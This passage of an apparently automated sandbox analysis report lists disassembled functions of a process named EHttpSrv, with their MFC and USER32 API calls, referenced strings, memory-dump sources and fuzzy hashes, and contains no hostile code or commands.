                                                                                                                  • Part of subcall function 2042FCB0: #3995.MFC80U(?,?,?,?,?,?), ref: 2042FD46
                                                                                                                  • Part of subcall function 2042FCB0: GetSysColor.USER32(00000014), ref: 2042FD55
                                                                                                                  • Part of subcall function 2042FCB0: #502.MFC80U(00000000,00000001,00000000), ref: 2042FD64
                                                                                                                  • Part of subcall function 2042FCB0: #5638.MFC80U(?,00000000,00000001,00000000), ref: 2042FD75
                                                                                                                  • Part of subcall function 2042FCB0: #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042FD83
                                                                                                                  • Part of subcall function 2042FCB0: #3995.MFC80U(00000001,?,?,?,?,?,00000000,00000001,00000000), ref: 2042FD90
                                                                                                                • #589.MFC80U(?,?), ref: 2042FC8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4117$#3995$#502#5638Color$ObjectRect$#2362#330#4755#589ClientCopyCurrentPixel
                                                                                                                • String ID:
                                                                                                                • API String ID: 1933966242-0
                                                                                                                • Opcode ID: 106bca368c93dcad6a37d183b57086cd195daf11abbfae5fd64e4fc3866764b0
                                                                                                                • Instruction ID: bf67b66eeb2af4af3a49994a45e750dcbfbab94742a63c72a59aa0bce75d9589
                                                                                                                • Opcode Fuzzy Hash: 106bca368c93dcad6a37d183b57086cd195daf11abbfae5fd64e4fc3866764b0
                                                                                                                • Instruction Fuzzy Hash: 7F0161721087459FC314DF65DC81BABB7ECFB89A28F408B2DF452866D0EB79A904C791
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 20433B9A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 20433BA9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • SetCursor.USER32(00000000,?,00000000,?,?), ref: 20433BCD
                                                                                                                • #1894.MFC80U ref: 20433BE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Cursor$#1894ClientScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1097337831-0
                                                                                                                • Opcode ID: 6e8bad8587e5a1bc7b03b88541dae4f67b5da31f90726aa4d83728ab5a48553e
                                                                                                                • Instruction ID: d0b058352fe7409e0972a8766911b0a5ff0b5ac52e584bb824b48cc46fa8e4be
                                                                                                                • Opcode Fuzzy Hash: 6e8bad8587e5a1bc7b03b88541dae4f67b5da31f90726aa4d83728ab5a48553e
                                                                                                                • Instruction Fuzzy Hash: 57F0CD351146045BC1149B64CC85FABB7ACEB88615F10CB1EF995832D0EA78B854D791
                                                                                                                APIs
                                                                                                                • #1946.MFC80U(?,?,2042F9D5,?,?), ref: 2042FBA7
                                                                                                                • CreatePopupMenu.USER32 ref: 2042FBAC
                                                                                                                • #1274.MFC80U(00000000,?,?), ref: 2042FBB5
                                                                                                                • AppendMenuW.USER32(?,00000000,?), ref: 2042FBED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$#1274#1946AppendCreatePopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 565603816-0
                                                                                                                • Opcode ID: aaf0739e9862d876b99429d21172c434b335f44f3f36f8acdd4ef8f58907c7ca
                                                                                                                • Instruction ID: 22653fce8f7fc219fa0d79c3d3a268c06482d39e5a006231ce4e4780a8ed22e2
                                                                                                                • Opcode Fuzzy Hash: aaf0739e9862d876b99429d21172c434b335f44f3f36f8acdd4ef8f58907c7ca
                                                                                                                • Instruction Fuzzy Hash: A7F0A476300F019FC231CBA4DCD4F7A73E5FB84604B208A6CEA5687A10DB75F401C621
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,00000000,20479989,000000FF,20444EE3,?,?,20441B98,00000000), ref: 20444F15
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U(FEEA6C22,?,?,?,?), ref: 204643C1
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U ref: 204643D6
                                                                                                                  • Part of subcall function 20464370: #776.MFC80U(?), ref: 204643F5
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464782
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464797
                                                                                                                • #2310.MFC80U(?,000001F9,?,0002081F,?,?,20441B98,00000000), ref: 20444F47
                                                                                                                • #4026.MFC80U(000001F8), ref: 20444F5B
                                                                                                                • #578.MFC80U ref: 20444F6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#578$#2310#4026#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 2713097316-0
                                                                                                                • Opcode ID: f38fdda6803060b10cda4cebfd11934e57a21f8a204cf63cbc7694572fa9a78b
                                                                                                                • Instruction ID: 62b18f49c2976f3a1648797b94e06c1760f7416b953b5242b11fe7e9a348d550
                                                                                                                • Opcode Fuzzy Hash: f38fdda6803060b10cda4cebfd11934e57a21f8a204cf63cbc7694572fa9a78b
                                                                                                                • Instruction Fuzzy Hash: 11012CB5148B41ABC304DF54CC85F9BBBE4FB84B55F008E2DF5A6422A1EF39A505CB91
                                                                                                                APIs
                                                                                                                • DestroyCursor.USER32(?), ref: 20461CFB
                                                                                                                • #741.MFC80U(FEEA6C22,00000000,00000000,2047A32F,000000FF,204609F4,?), ref: 20461D09
                                                                                                                • #578.MFC80U(FEEA6C22,00000000,00000000,2047A32F,000000FF,204609F4,?), ref: 20461D16
                                                                                                                • #605.MFC80U ref: 20461D26
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#605#741CursorDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2649864807-0
                                                                                                                • Opcode ID: 72c7e532bf72629e51e410de0217574248842e4c710283ec1e03ec363cfc3b25
                                                                                                                • Instruction ID: 00fa475b0f723163b9ef425cedf1ac6c6dd878fe1d6408c9c5d916e06b312514
                                                                                                                • Opcode Fuzzy Hash: 72c7e532bf72629e51e410de0217574248842e4c710283ec1e03ec363cfc3b25
                                                                                                                • Instruction Fuzzy Hash: 5D016DB1108B818FD311DF64C884B5ABBE4FB54724F008E2DF4A2837A0DB79A504CB92
                                                                                                                APIs
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239A3
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239B3
                                                                                                                • #587.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239C3
                                                                                                                • #605.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #620$#587#605
                                                                                                                • String ID:
                                                                                                                • API String ID: 1344418851-0
                                                                                                                • Opcode ID: e4373f1ffc39f3d123fc98dec62f3b610d6eb1b7b3b21473807efdfda39071a7
                                                                                                                • Instruction ID: 17e832972ff24de2340f15e5b985e6d048a7fa2478449078d64daeb3ea82d8d6
                                                                                                                • Opcode Fuzzy Hash: e4373f1ffc39f3d123fc98dec62f3b610d6eb1b7b3b21473807efdfda39071a7
                                                                                                                • Instruction Fuzzy Hash: A3F0EC710087819BC315CF24C855BEABBE4FBA5624F40CE1DF4A6476A0DB796609C792
                                                                                                                APIs
                                                                                                                • #764.MFC80U(2040FAB2,?,2041270C), ref: 20410EEB
                                                                                                                • #764.MFC80U(000000FF,?,2041270C), ref: 20410EFB
                                                                                                                • #764.MFC80U(20481BC6,?,2041270C), ref: 20410F0B
                                                                                                                • #764.MFC80U(?,?,2041270C), ref: 20410F1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 53785fc8c5d8aa416b36db5ead045fe28ddff352e4ae91a238ca4cb2fcf491b7
                                                                                                                • Instruction ID: aa89646db224e286d08f34acd16ae685d5e3d0b2f5bbc42a80b755ba2ba03713
                                                                                                                • Opcode Fuzzy Hash: 53785fc8c5d8aa416b36db5ead045fe28ddff352e4ae91a238ca4cb2fcf491b7
                                                                                                                • Instruction Fuzzy Hash: 31E012F2E1172147D931AAB5BC02F5763FC5E10910704C868E90DE7750E66CFE4986E2
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AC8
                                                                                                                • #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AD8
                                                                                                                • #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AE8
                                                                                                                • #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: d8e0d085c19e314a48a1a9d527d5c971ea9ff2f61093a01c00064bde6e98c76d
                                                                                                                • Instruction ID: 2f56db5e7e50298a93a4395ebbfe2a0783e2749026fa76c7b127cb879bf8f226
                                                                                                                • Opcode Fuzzy Hash: d8e0d085c19e314a48a1a9d527d5c971ea9ff2f61093a01c00064bde6e98c76d
                                                                                                                • Instruction Fuzzy Hash: 29E012F0B0031147DE31D9B59D42F1763BC5F10980704CC28B80ED2750E92CF858C9A6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
                                                                                                                • #1176.MFC80U ref: 2041A3AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176_wcsicmp
                                                                                                                • String ID: RULE$RULES
                                                                                                                • API String ID: 2845765141-712924407
                                                                                                                • Opcode ID: fd79992d94718f941946dc9e5921394aec7a051119f5e79913273f0386f3e403
                                                                                                                • Instruction ID: b4e5ab64a95f3cd3e80be46b906802b12ab383ea1aacfb3d5f14cde5a2b4de09
                                                                                                                • Opcode Fuzzy Hash: fd79992d94718f941946dc9e5921394aec7a051119f5e79913273f0386f3e403
                                                                                                                • Instruction Fuzzy Hash: 3871A772504345DBC720CF94C880B9EF7E5BBD4718F04CA2EE99997240E73D9A95C762
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
                                                                                                                • #1176.MFC80U ref: 2041F86B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176_wcsicmp
                                                                                                                • String ID: ZONE$ZONES
                                                                                                                • API String ID: 2845765141-1311964101
                                                                                                                • Opcode ID: 0b0506ad5b2d146664ced8278c20028e6b8f1e5887b66f19d395d1db46f6c2ab
                                                                                                                • Instruction ID: e962bf3334346c320cba89ab3e971ff476eb2335ab69f2fcf4e18d4b151ddf76
                                                                                                                • Opcode Fuzzy Hash: 0b0506ad5b2d146664ced8278c20028e6b8f1e5887b66f19d395d1db46f6c2ab
                                                                                                                • Instruction Fuzzy Hash: FA41C8725083419BC714DFA4C881B9EF7D5BBD4618F04CB2EE59963240E73DAA868753
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ;TYPE=SUBNODE
                                                                                                                • API String ID: 4009619764-510700506
                                                                                                                • Opcode ID: 295bf4163d2ba2424e6742c7e7ee4d3692e7ed40754a85512b7c0dd1c1e29102
                                                                                                                • Instruction ID: 923173743ffc042a4c26aee04fc60cb36920cbffe0cc6cb874af857bf3bee5e6
                                                                                                                • Opcode Fuzzy Hash: 295bf4163d2ba2424e6742c7e7ee4d3692e7ed40754a85512b7c0dd1c1e29102
                                                                                                                • Instruction Fuzzy Hash: 732105716042005BD724DB98DC82BEB73A5EFD8308F54C83DF54A8A240EA39DA58C793
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcstoul
                                                                                                                • String ID: END
                                                                                                                • API String ID: 892063014-2522575163
                                                                                                                • Opcode ID: 516d9ee3ffe1919fc515415a9a8dc2ebfd4fbd04545ce6306222040cf46a9d83
                                                                                                                • Instruction ID: d781e54f4b726f0326807b470d3a4157c85b224036378ecabbc1ca170fd87aed
                                                                                                                • Opcode Fuzzy Hash: 516d9ee3ffe1919fc515415a9a8dc2ebfd4fbd04545ce6306222040cf46a9d83
                                                                                                                • Instruction Fuzzy Hash: 7B1193366182064FC700DF58DC41EA7B3E5EBD4655F44892AE885DB250F664EA48C7E2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcstoul
                                                                                                                • String ID: END
                                                                                                                • API String ID: 892063014-2522575163
                                                                                                                • Opcode ID: 6eea9143e0841a8954e2af8905f97407e0c322005e003e2375bcde716abbfe52
                                                                                                                • Instruction ID: 45325b7411c91057e604454dbfd3b01e2674a9d4fe60a20d8b2dc2addd9da03c
                                                                                                                • Opcode Fuzzy Hash: 6eea9143e0841a8954e2af8905f97407e0c322005e003e2375bcde716abbfe52
                                                                                                                • Instruction Fuzzy Hash: 8D1190366182068BC600DF58EC41EA7B3E5EBD4755F448A2AF844D7250E6A4EE49C7E2
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,USER_NAME,?,?,2041A6FB,?,?,?,APP,00000000,?), ref: 204169C2
                                                                                                                • #265.MFC80U(00000000,USER_NAME,?,?,2041A6FB,?,?,?,APP,00000000,?), ref: 20416A19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: USER_NAME
                                                                                                                • API String ID: 2915978212-2711683876
                                                                                                                • Opcode ID: 60220bc3fac06e7d7fd8e22c1c3b1263feaf933f0dec8b28df8d309dc7ad7a3c
                                                                                                                • Instruction ID: 718287ba2ef2795e51430284b6d98f088cd25205a8662a8475a34baa831e6628
                                                                                                                • Opcode Fuzzy Hash: 60220bc3fac06e7d7fd8e22c1c3b1263feaf933f0dec8b28df8d309dc7ad7a3c
                                                                                                                • Instruction Fuzzy Hash: 6011A97260020247C7285B68C8167A7B2A5EF94384F1DC66CDD07CB795E779EA45C280
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,USER_NAME,?,?,2041F9F5,?,?,?,?,?,?,00000000,?,00000000), ref: 2041D2BF
                                                                                                                • #265.MFC80U(00000000,USER_NAME,?,?,2041F9F5,?,?,?,?,?,?,00000000,?,00000000), ref: 2041D313
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: USER_NAME
                                                                                                                • API String ID: 2915978212-2711683876
